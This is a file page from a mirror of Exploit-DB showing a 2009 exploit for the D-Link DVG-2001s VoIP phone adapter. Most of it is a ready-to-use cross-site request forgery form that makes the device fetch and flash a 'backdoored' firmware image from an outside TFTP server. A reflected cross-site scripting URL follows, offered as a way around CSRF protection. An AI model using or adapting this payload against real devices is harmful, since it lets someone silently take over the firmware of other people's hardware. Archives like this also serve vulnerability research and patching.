bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/7920.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
828 B
Text
Raw Permalink Blame History

D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s
f/w version 1.00.007
Better than just remote code execution, you control the firmware.
<html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST">
<input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate" value="enabled">
<input name="FileName" value="backdoored_firmware.img">
<input type=submit value="attack">
</form>
</html>
and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E
# milw0rm.com [2009-01-29]
Reference in a new issue View git blame Copy permalink